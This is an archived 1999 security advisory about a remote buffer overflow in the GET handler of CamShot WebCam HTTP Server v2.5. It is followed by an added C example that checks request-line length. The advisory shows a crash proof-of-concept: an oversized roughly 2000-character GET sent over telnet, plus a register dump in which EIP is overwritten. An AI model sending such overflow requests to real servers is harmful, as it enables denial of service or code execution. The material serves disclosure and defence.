camshot.overflow.txt

31 Dec 1999 00:00:00 | Reported by Underground Security Systems Research | Type: packetstorm | Source: packetstormsecurity.com

Local/Remote Buffer Overflow in CamShot WebCam HTTP Server v2.5 for Windows systems detected.

Code
`---------- Forwarded message ----------  
From: "Ussr Labs" <[email protected]>  
To: "TECHNOTRONIC" <[email protected]>  
Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT  
Date: Thu, 30 Dec 1999 14:04:14 -0300  
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP  
Server v2.5 for Win9x/NT  
  
USSR Advisory Code: USSR-99028  
  
Release Date:  
December 30, 1999 [4/5]  
  
Systems Affected:  
CamShot WebCam HTTP Server v2.5 for Win9x and possibly other versions.  
  
About The Software:  
CamShot is a Windows 95/98/NT web server that serves up web pages containing  
time stamped images captured from a video camera. The images can be viewed from  
anywhere on the network with a web browser. CamShot works with 'Video For Windows'  
compatible video equipment. Finally a cheap and simple way to do remote surveillance  
is here!  
  
THE PROBLEM  
  
UssrLabs found a local / remote buffer overflow. The code that handles GET  
commands has an unchecked buffer that allows arbitrary code to be executed if it  
is overflowed.  
  
Do you do the w00w00?  
This advisory also acts as part of w00giving. This is another contribution  
to w00giving for all you w00nderful people out there. You do know what  
w00giving is don't you? http://www.w00w00.org/advisories.html  
  
Example  
[hell@imahacker]$ telnet die.communitech.net 80  
Trying example.com...  
Connected to die.communitech.net  
Escape character is '^]'.  
GET (buffer) HTTP/1.1 <enter><enter>  
  
Where (buffer) is approx. 2000 characters. At this point the server overflows.  
  
On the remote machine, someone will see something like this:  
  
CAMSHOT caused an invalid page fault in  
module <unknown> at 0000:61616161.  
Registers:  
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246  
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058  
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff  
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000  
Bytes at CS:EIP:  
  
Stack dump:  
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74  
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8  
  
Binary or source for this Exploit (when we finish it):  
  
http://www.ussrback.com/  
  
Vendor Status:  
Informed.  
  
Vendor Url: http://www.broadgun.com/arcit/index.html  
Program Url: http://broadgun.com/Camshot.htm  
  
Credit: USSRLABS  
  
SOLUTION  
Nothing yet.  
  
Greetings:  
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and  
Wiretrip.  
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h  
http://www.ussrback.com  
  
  
  
`
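
The advisory attributes the crash to an unchecked buffer in the GET handler. The following is an added example, not code from the advisory or from the vendor: one way a server can measure the request target before copying it, so that a roughly 2000-character GET is rejected instead of overrunning a fixed buffer. The function name `parse_get_line`, the `URI_MAX` limit and the status-code mapping are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define URI_MAX 255   /* assumed limit; choose one that fits the application */

/* Result codes double as the HTTP status a server would send back. */
enum { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/*
 * Parse "GET <uri> HTTP/x.y" from a request line of known length.
 * The URI is copied into out (capacity out_cap) only after its length
 * has been checked against both URI_MAX and out_cap. An unchecked
 * strcpy() or sscanf("%s") into a fixed stack buffer at this step is the
 * class of bug the advisory describes (assumed; the advisory does not
 * show the server's code).
 */
int parse_get_line(const char *line, size_t len, char *out, size_t out_cap)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof(method) - 1;
    const char *uri, *end, *sp;
    size_t uri_len;

    if (line == NULL || out == NULL || out_cap == 0)
        return REQ_BAD;
    out[0] = '\0';
    if (len < mlen || memcmp(line, method, mlen) != 0)
        return REQ_BAD;

    uri = line + mlen;
    end = line + len;
    /* Find the space that ends the URI without reading past len. */
    sp = memchr(uri, ' ', (size_t)(end - uri));
    if (sp == NULL)
        return (size_t)(end - uri) > URI_MAX ? REQ_URI_TOO_LONG : REQ_BAD;

    uri_len = (size_t)(sp - uri);
    if (uri_len == 0)
        return REQ_BAD;
    if (uri_len > URI_MAX || uri_len >= out_cap)
        return REQ_URI_TOO_LONG;   /* reject; never truncate and continue */
    if ((size_t)(end - sp) < 6 || memcmp(sp + 1, "HTTP/", 5) != 0)
        return REQ_BAD;

    memcpy(out, uri, uri_len);
    out[uri_len] = '\0';
    return REQ_OK;
}
```

The caller is expected to pass the number of bytes actually read from the socket as `len`, so the parser never depends on the input being NUL-terminated.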
